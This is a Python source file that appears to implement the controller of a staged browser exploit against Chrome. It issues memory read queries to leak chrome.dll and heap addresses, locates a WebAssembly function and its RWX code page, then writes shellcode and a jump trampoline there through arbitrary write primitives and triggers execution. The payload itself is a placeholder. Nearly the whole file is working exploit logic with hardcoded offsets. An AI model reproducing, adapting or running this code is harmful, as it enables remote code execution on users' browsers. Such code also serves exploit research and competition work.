from core.core30_context.context import Context
from core.core30_context.context_dependency_graph import context_dependencies

from .pwn_utils import gather_for_context, gather_addresses_for_leak, u64, p64, u32
from ..model.read_query_answer import ReadQueryAnswer
from ..model.read_query import ReadQuery
from ..model.event import Event
from ..model.with_context import search_query
from ..model.write_query_answer import WriteQueryAnswer
from ..model.write_query import WriteQuery

from action.utils.local_state import Store

from sqlalchemy.orm import joinedload
from enum import Enum, auto
import time


@context_dependencies(('.state.store', Store))
def initialize_store(ctxt: Context, defaults):
    current_store = ctxt['state']['store']
    for k, v in defaults.items():
        if not k in current_store:
            current_store[k] = v
    return current_store

@context_dependencies(('.state.store', Store))
def get_store(ctxt: Context):
    return ctxt['state']['store']


class STEP(Enum):
    REL_LEAK = auto()
    ABS_LEAK = auto()
    RWX_LEAK = auto()
    WRITE_AND_JUMP = auto()
    FINISHED = auto()

class PwnContext:

    def __init__(self, ctxt, set_time=False):
        self.resolved_leaks = {}
        self.leaks_to_issue = set()
        self.issued_leaks = set()
        self.ctxt = ctxt
        self.ctxt_search = search_query(self.ctxt)

        self.pwn_context_store = initialize_store(
            {
                'ask_trigger': False,
                'ask_stop': False,
                'ask_crash': False,
                'initial_heap': False,
                'terminated': False,
                'step': STEP.REL_LEAK.name,
                'connection_time': False,
            }
        )
        if set_time:
            self.pwn_context_store['connection_time'] = time.time()
        self.update_step()
        self.update_from_db()

    def update_step(self, new_step: STEP | None = None):
        if not new_step:
            self.step = getattr(STEP, self.pwn_context_store['step'])
        else:
            self.pwn_context_store['step'] = new_step.name
            self.step = new_step

    def update_from_db(self):
        self.all_leaks = ReadQuery.filter_by_context(self.ctxt) \
            .outerjoin(ReadQueryAnswer) \
            .options(joinedload(ReadQuery.answer)) \
            .all()
        previous_known = set(self.resolved_leaks.keys())
        self.all_leaks_per_addr = {
            l.type_read + hex(l.address): l for l in self.all_leaks
        }
        self.resolved_leaks = {
            l.type_read + hex(l.address): l for l in self.all_leaks if l.answer and l.answer[0].content
        }
        print(f"UPDATED RESOLVED LEAKS for {self.ctxt}")
        print(self.resolved_leaks)
        print(self.all_leaks)
        self.pending_leaks = [
            l.type_read + hex(l.address) for l in self.all_leaks if not l.answer or not l.answer[0].content
        ]
        self.crash = Event.filter_by_context(self.ctxt) \
            .filter_by(type='crash') \
            .one_or_none()
        self.pwn_context_store['ask_crash'] = self.crash and self.crash.value == 1
        self.trigger = Event.filter_by_context(self.ctxt) \
            .filter_by(type='trigger') \
            .one_or_none()
        self.pwn_context_store['ask_trigger'] = self.trigger and self.trigger.value == 1
        return [addr for addr in self.resolved_leaks if addr not in previous_known]

    def loop(self):
        # while not terminated:
        #  - check new resolved leaks
        #  - for each one, remove the entry in pending
        #  - for each pending entry not issued, issue it
        self.handle_pwn([])
        last_delay = time.time()
        while not self.pwn_context_store['terminated']:
            new_leaks = self.update_from_db()
            if new_leaks:
                print(f"[+] {len(new_leaks)} new leaks obtained :)")
                cur_step = None
                while cur_step != self.step:
                    cur_step = self.step
                    self.handle_pwn(new_leaks)  # if it changes self.step, we continue trying different steps
            self.minimal_check()
            time.sleep(5)
            if time.time() - last_delay > 0.6:
                last_delay = time.time()
                self.handle_pwn([])

    def minimal_check(self):
        for pending_addr in self.pending_leaks:
            if pending_addr not in self.issued_leaks:
                self.leaks_to_issue.add(pending_addr)

    def terminate(self):
        self.pwn_context_store['terminated'] = True

    def next_read_queries(self):
        self.issued_leaks = self.issued_leaks.union(self.leaks_to_issue)
        to_issue_copy = self.leaks_to_issue
        self.leaks_to_issue = set()
        return [self.all_leaks_per_addr[addr] for addr in to_issue_copy]

    def next_write_queries(self):
        self.all_writes = WriteQuery.filter_by_context(self.ctxt) \
            .outerjoin(WriteQueryAnswer) \
            .options(joinedload(WriteQuery.answer)) \
            .all()
        self.no_answer_yet = [w for w in self.all_writes if not w.answer]
        for w_na in self.no_answer_yet:
            WriteQueryAnswer.get_create(write_query=w_na, status='pending')
        return self.no_answer_yet

    def next_stop_query(self):
        if self.pwn_context_store['ask_stop'] and not self.leaks_to_issue and not self.pending_leaks:
            self.pwn_context_store['ask_stop'] = False
            print("[.] Stop asked")
            return True

    def next_crash_query(self):
        return self.pwn_context_store['ask_crash']

    def next_set_high_bit(self):
        return self.pwn_context_store['initial_heap'] if 'initial_heap' in self.pwn_context_store else False

    def next_trigger_query(self):
        tmp = self.pwn_context_store['ask_trigger']
        self.pwn_context_store['ask_trigger'] = False
        if tmp:
            print("[.] Trigger pulled asked")
        return tmp

    def emit_stop(self, stop=True):
        self.pwn_context_store['ask_stop'] = stop

    @staticmethod
    def addr_key(addr, is_absolute):
        return ('REL:' if not is_absolute else 'ABS:') + hex(addr)

    def check_rel_addr_queried(self, addr):
        key = self.addr_key(addr, False)
        return key in self.pending_leaks or key in self.all_leaks_per_addr

    @staticmethod
    def uint64_offset(offset):
        return offset if offset >= 0 else (0x10000000000000000 + offset)

    def handle_rel_leak(self, new_leak_addresses):
        print(f"[.] Handling relative leak with new leak addresses {new_leak_addresses}")
        if 'neg_offset' not in self.pwn_context_store:
            self.pwn_context_store['neg_offset'] = 0x3000
            self.pwn_context_store['chunk_size'] = 0x100
            self.pwn_context_store['n_read'] = 0x20
        neg_offset = self.pwn_context_store['neg_offset']
        chunk_size = self.pwn_context_store['chunk_size']
        n_read = self.pwn_context_store['n_read']

        dontquit = False
        for i in range(n_read):
            rel_offset = self.uint64_offset(-neg_offset+i*chunk_size)
            addr_key = self.addr_key(rel_offset, False)
            if not self.check_rel_addr_queried(rel_offset):
                print(f"[.] Adding read request (rel) with offset {hex(rel_offset)} and size {hex(chunk_size)}")
                ReadQuery.get_create(address=rel_offset, size=chunk_size, is_absolute=False, **self.ctxt_search)
            if addr_key in self.resolved_leaks:
                print(f"[+] INFO: {addr_key} is known: {self.resolved_leaks[addr_key]}")
                print(self.resolved_leaks[addr_key].answer[0].content.hex())
            else:
                print("RESOLVED LEAKS ?")
                print(self.resolved_leaks)
                print(addr_key)
                dontquit = True

        if not dontquit:
            print("[.] Checking provided content")
            content = gather_for_context(self.ctxt)
            main_addresses = list(gather_addresses_for_leak(content))
            print(f"[.] Got stats: {main_addresses}")
            most_addr = main_addresses[0]
            current_heap = most_addr[1][0]
            print(f"[.] At most we saw some {hex(current_heap)}")
            self.pwn_context_store['initial_heap'] = current_heap
            for base, arr in main_addresses:
                if base & 0xfff000000000 == 0x7ff000000000:
                    print(f"[+] May have found chrome.dll {list(map(hex, arr))}")
                    for addr in arr:
                        if addr & 0xfff == 0xd78:
                            print(f"[++] Sure we got the vtable blink")
                            self.pwn_context_store['chrome'] = addr
                            #self.pwn_context['target_base'] = (arr[0] & 0xffffff000000) + 0x1005138
                            self.pwn_context_store['target_base'] = addr - 0x89b3c0
                            break
                        elif addr & 0xfff == 0x110:
                            print(f"[++] Sure we got the vtable blink (bis)")
                            self.pwn_context_store['chrome'] = addr
                            # self.pwn_context['target_base'] = (arr[0] & 0xffffff000000) + 0x1005138
                            self.pwn_context_store['target_base'] = addr + 0x866028
                            break

            key_target1 = self.uint64_offset(-0x40)
            key_addr1 = self.addr_key(key_target1, False)
            key_target2 = self.uint64_offset(-0x78)
            key_addr2 = self.addr_key(key_target2, False)
            for addr in [key_target1, key_target2]:
                if not self.check_rel_addr_queried(addr):
                    rq = ReadQuery.get_create(address=addr,
                                              size=8,
                                              is_absolute=False,
                                              **self.ctxt_search)
            if key_addr1 in self.resolved_leaks and key_addr2 in self.resolved_leaks:
                leaked = u64(self.resolved_leaks[key_addr1].answer[0].content)
                print(f"[+] KEY REL TARGET 1 IS {hex(leaked)}")
                target1 = ((leaked * 2) & 0xffffffff) + (current_heap & 0xffffffff00000000)
                leaked = u64(self.resolved_leaks[key_addr2].answer[0].content)
                print(f"[+] KEY REL TARGET 2 IS {hex(leaked)}")
                target2 = ((leaked * 2) & 0xffffffff) + (current_heap & 0xffffffff00000000)
                print(f"[+] This gives: target1 = {hex(target1)}")
                print(f"[+] This gives: target2 = {hex(target2)}")
                buf_is_at = target2 + 0xe0
                self.pwn_context_store['abs_offset'] = -buf_is_at
                check_at = self.uint64_offset(target1 - buf_is_at)
                check_at_key = self.addr_key(check_at, False)
                if not self.check_rel_addr_queried(check_at):
                    ReadQuery.get_create(address=check_at,
                                         size=0x30,
                                         is_absolute=False,
                                         **self.ctxt_search)

                heapbase = self.uint64_offset(self.pwn_context_store['target_base'] + self.pwn_context_store['abs_offset'])
                check_at_heap = self.addr_key(heapbase, False)
                if not self.check_rel_addr_queried(heapbase):
                    ReadQuery.get_create(address=heapbase,
                                         size=0x30,
                                         is_absolute=False,
                                         **self.ctxt_search)

                if check_at_key in self.resolved_leaks and check_at_heap in self.resolved_leaks:
                    print(f"[+] We verified buffer address: {self.resolved_leaks[check_at_key].answer[0].content.hex()}")
                    print(f"[+] We know the offset: {hex(self.pwn_context_store['abs_offset'])}")
                    print(f"[+] We also leaked the base: {self.resolved_leaks[check_at_heap].answer[0].content.hex()}")
                    self.pwn_context_store['heap_base'] = u64(self.resolved_leaks[check_at_heap].answer[0].content[0x20:0x28])
                    other_pointer_base = u64(self.resolved_leaks[check_at_heap].answer[0].content[0x10:0x18])
                    # 0x40C080, 0x40E4C0
                    self.pwn_context_store['target_interesting'] = (other_pointer_base & 0xffffffffff000000) + 0
                    self.pwn_context_store['target_base_rwx'] = (other_pointer_base & 0xffffffffff000000) + 0x24C0
                    self.pwn_context_store['counter_leak_rwx'] = 0x1d
                    self.update_step(STEP.ABS_LEAK)


    def try_leak_absolute_at(self, offset, size):
        offset_leakbase = self.uint64_offset(
            self.pwn_context_store['abs_offset'] + offset
        )
        addr_key = self.addr_key(offset_leakbase, False)
        if not self.check_rel_addr_queried(offset_leakbase):
            print(f"[.] Adding {hex(offset_leakbase)} for {hex(offset)}")
            ReadQuery.get_create(address=offset_leakbase, size=size, is_absolute=False, **self.ctxt_search)
        if addr_key in self.resolved_leaks:
            print(
                f"[+] INFO leak at offset {hex(offset)}: {self.resolved_leaks[addr_key]}")
            content = self.resolved_leaks[addr_key].answer[0].content
            print(content.hex())
            return content


    def handle_abs_leak(self, new_leak_addresses):
        print(f"[.] Handling absolute leak with new leak addresses {new_leak_addresses}")

        if 'heap_base' not in self.pwn_context_store:
            print(f"[-] No heap base after redo, exiting")
            self.update_step(STEP.REL_LEAK)
            return

        if 'cur_offset_pattern' not in self.pwn_context_store:
            self.pwn_context_store['cur_offset_pattern'] = self.pwn_context_store['heap_base'] + 0x290000
            self.pwn_context_store['chunk_size2'] = 0x1000
            print(f"[+] Heap base is at {hex(self.pwn_context_store['heap_base'])}")

        content = self.try_leak_absolute_at(self.pwn_context_store['cur_offset_pattern'],
                                            self.pwn_context_store['chunk_size2'])


        pattern = bytes.fromhex('405555d5')  # 0xddddeeaaaaaa
        if content:
            self.pwn_context_store['cur_offset_pattern'] += self.pwn_context_store['chunk_size2']
            if pattern in content:
                print("[++++] YES we found our table :)")
                self.pwn_context_store['found_pattern'] = -self.pwn_context_store['cur_offset_pattern'] + content.index(pattern)//2


        local = 'local' in self.ctxt.instance_id.lower()
        if 'found_pattern' in self.pwn_context_store and self.pwn_context_store['found_pattern'] or (local and False):
            if local:
                self.pwn_context_store['LOCAL'] = 'LOCAL'

            for i in range(0, len(content)-24, 4):
                data = content[i:i+4]
                if u32(data) == 0x20:
                    bad = False
                    for j in range(16):
                        if i+4+j*4+3 < len(content) and content[i+4+j*4+3] != 0 or content[i+4+j*4+2] == 0:
                            bad = True
                    if not bad:
                        if content[i+4+64:i+4+64+8] == b'\xb1\x07\x00\x00\x40\x55\x55\xd5':
                            print("[++++] Array located :), extracting the wasm function")
                            wasm_func = u32(content[i+4+56:i+4+56+4])
                            print(f"[+] WASM REL is {hex(wasm_func)}")
                            self.pwn_context_store['wasm_abs'] = wasm_func + self.pwn_context_store['heap_base'] - 1
                            print(f"[+] WASM ABS is {hex(self.pwn_context_store['wasm_abs'])}")

            self.update_step(STEP.RWX_LEAK)


    def handle_RWX_leak(self, new_leak_addresses):
        print(f"[.] Handling WASM / RWX with new leak addresses {new_leak_addresses}")

        if self.pwn_context_store['wasm_abs'] == 'LOCAL':  # speed up the process
            content = b'\x00'*0xc+b'\x00\x60\x00\x02'
        else:
            content = self.try_leak_absolute_at(self.pwn_context_store['wasm_abs'],
                                                0x30)

        if content:
            print("[+] FOUND WASM REL")
            wasm_offset = u32(content[0xc:0x10]) // 256
            self.pwn_context_store['wasm_offset'] = wasm_offset
            print(f"[+] Will have to add {hex(wasm_offset)} to the final leak")

            big_offset = 0x10000 * self.pwn_context_store['counter_leak_rwx'] + self.pwn_context_store['target_interesting']
            if 'LOCAL' in self.pwn_context_store:
                #big_offset += 0x40C000 - 0x1D0000
                big_offset += 0x1EC000 - 0x1D0000
            content1 = self.try_leak_absolute_at(big_offset, 0x100)

            big_offset2 = 0x10000 * self.pwn_context_store['counter_leak_rwx'] + self.pwn_context_store['target_base_rwx']
            if 'LOCAL' in self.pwn_context_store:
                #big_offset += 0x40C000 - 0x1D0000
                big_offset2 += 0x1EC000 - 0x1D0000
            content2 = self.try_leak_absolute_at(big_offset2, 0x100)

            if not content1 and not content2:
                self.pwn_context_store['ask_trigger'] = True

            if content1:
                begin = u64(content1[8:0x10])
                if begin != big_offset:
                    print(f"[-] Bad offset will have to retry ({hex(begin)} against addr targeted {hex(big_offset)})")
                    if 'LOCAL' in self.pwn_context_store:
                        self.pwn_context_store['counter_leak_rwx'] += 0x40-0x1e
                    else:
                        print("[-] bad bad bad should not happen")
                if content1 and content2 and (begin == big_offset or 'LOCAL' not in self.pwn_context_store):
                    self.pwn_context_store['pointer_to_wasm_rwx'] = u64(content2[:8])
                    print(f"[+++] Leaked almost the RWX POINTER ! {hex(self.pwn_context_store['pointer_to_wasm_rwx'])}")

                    content = self.try_leak_absolute_at(self.pwn_context_store['pointer_to_wasm_rwx'] + wasm_offset,
                                                        0x30)
                    if content:
                        last_pointer = u64(content[:8])
                        print(f"[++++] INFO (NOUS Y FUMES) RWX pointer is at {hex(last_pointer)}")

                        self.pwn_context_store['pointer_to_rwx'] = last_pointer
                        content = self.try_leak_absolute_at(self.pwn_context_store['pointer_to_rwx'], 0x3000)
                        if content:
                            print(f"[++++] You should have leaked some code")
                            self.pwn_context_store['rwx_content_from_pointer_to_rwx'] = content
                            self.update_step(STEP.WRITE_AND_JUMP)


    def try_write_absolute_at(self, addr, content):
        if not WriteQuery.search_query(hex(addr), hex(content), self.ctxt):
            print(f"[.] Adding write query at {hex(addr)} for {hex(content)}")
            WriteQuery.get_create(address=hex(addr), content=hex(content), **self.ctxt_search)


    def handle_shellcode(self, new_leak_addresses):
        print(f"[.] Handling end of the exploit {new_leak_addresses}")

        free_rwx_space_index = (self.pwn_context_store['pointer_to_rwx'] & 0xffffffffffff4000) - \
                                self.pwn_context_store['pointer_to_rwx']
        print(f"[+] Found some free space (?) at {hex(free_rwx_space_index)} (or not let's try without)")

        shellcode = BRING_YOUR_OWN_SHELLCODE_HERE
    
        if 'LOCAL' in self.pwn_context_store:
            print("Last check")
            highbits_wasm = self.pwn_context_store['pointer_to_rwx'] & 0xffffffff00000000
            for i in range(4):
                content = None
                while not content:
                    self.update_from_db()
                    content = self.try_leak_absolute_at(
                        self.pwn_context_store['pointer_to_wasm_rwx'] + self.pwn_context_store['wasm_offset'] - 1 - i, 8)
                    time.sleep(1)
                time.sleep(5)
                self.pwn_context_store['pointer_to_rwx'] = u32(content[-4:])+highbits_wasm
                free_rwx_space_index = 0x10000
                print("Received content to check")


        print(f"[++++] You should have written some RWX code, now finishing"
              f"(writing at {hex(self.pwn_context_store['pointer_to_rwx'] + free_rwx_space_index)}) and "
              f"{hex(self.pwn_context_store['pointer_to_rwx'])}")

        print("SETUP READY, break, input and go!")
        if 'LOCAL' in self.pwn_context_store:
            input()

        shellcode_jmp = b'\x48\xb8' + p64(self.pwn_context_store['pointer_to_rwx'] + free_rwx_space_index)
        shellcode_jmp += b'\xff\xe0'
        shellcode_jmp += b'\x00' * (0x10 - len(shellcode_jmp))

        final_shellcode = shellcode

        to_write = u64(b'\xeb\xfe\x00\x00\x00\x00\x00\x00')
        addr = self.pwn_context_store['pointer_to_rwx']
        self.try_write_absolute_at(addr, to_write)
        self.pwn_context_store['ask_trigger'] = True

        print("[.] Entered infinite loop")

        for i in range(0, max(len(final_shellcode), 100), 8):
            to_write = u64(final_shellcode[i:i+8] + b'\x00'*(8 - len(final_shellcode[i:i+8])))
            addr = self.pwn_context_store['pointer_to_rwx'] + free_rwx_space_index + i
            self.try_write_absolute_at(addr, to_write)

        time.sleep(1)

        for i in range(0, len(shellcode_jmp), 8):
            to_write = u64(shellcode_jmp[i:i + 8] + b'\x00' * (8 - len(shellcode_jmp[i:i+8])))
            addr = self.pwn_context_store['pointer_to_rwx'] + i
            self.try_write_absolute_at(addr, to_write)

        existing_event = Event.get_create(type='trigger', **self.ctxt_search)
        existing_event.value = 1

        print(f"[++++] Trampoline written, now finishing")
        if 'LOCAL' in self.pwn_context_store:
            time.sleep(1.1)
        else:
            time.sleep(0.6)
        self.pwn_context_store['ask_trigger'] = True

        time.sleep(1)


    def handle_pwn(self, new_leak_addresses):
        # self.emit_stop()
        # self.update_step(STEP.FINISHED)
        match self.step:
            case STEP.REL_LEAK:
                self.handle_rel_leak(new_leak_addresses)
            case STEP.ABS_LEAK:
                self.handle_abs_leak(new_leak_addresses)
            case STEP.RWX_LEAK:
                self.handle_RWX_leak(new_leak_addresses)
            case STEP.WRITE_AND_JUMP:
                self.handle_shellcode(new_leak_addresses)
            case STEP.FINISHED:
                print("[.] In finished state, stopping")
            case _:
                raise NotImplementedError


    def feed_until_crash(self):
        neg_offset = 0x2000
        chunk_size = 0x10
        for i in range(0x1c0, 0x200):
            rel_offset = 0x10000000000000000 - neg_offset + i*chunk_size
            if not self.check_rel_addr_queried(rel_offset):
                print(f"[.] Adding read request (rel) with offset {hex(rel_offset)} and size {hex(chunk_size)}")
                ReadQuery.get_create(address=rel_offset, size=chunk_size, is_absolute=False, **self.ctxt_search)

        for i in range(0, 0x30):
            rel_offset = i*chunk_size
            if not self.check_rel_addr_queried(rel_offset):
                print(f"[.] Adding read request (rel) with offset {hex(rel_offset)} and size {hex(chunk_size)}")
                ReadQuery.get_create(address=rel_offset, size=chunk_size, is_absolute=False, **self.ctxt_search)
        self.pwn_context_store['ask_crash'] = True

        existing_event = Event.get_create(type='crash', **self.ctxt_search).one_or_none()
        existing_event.value = 1
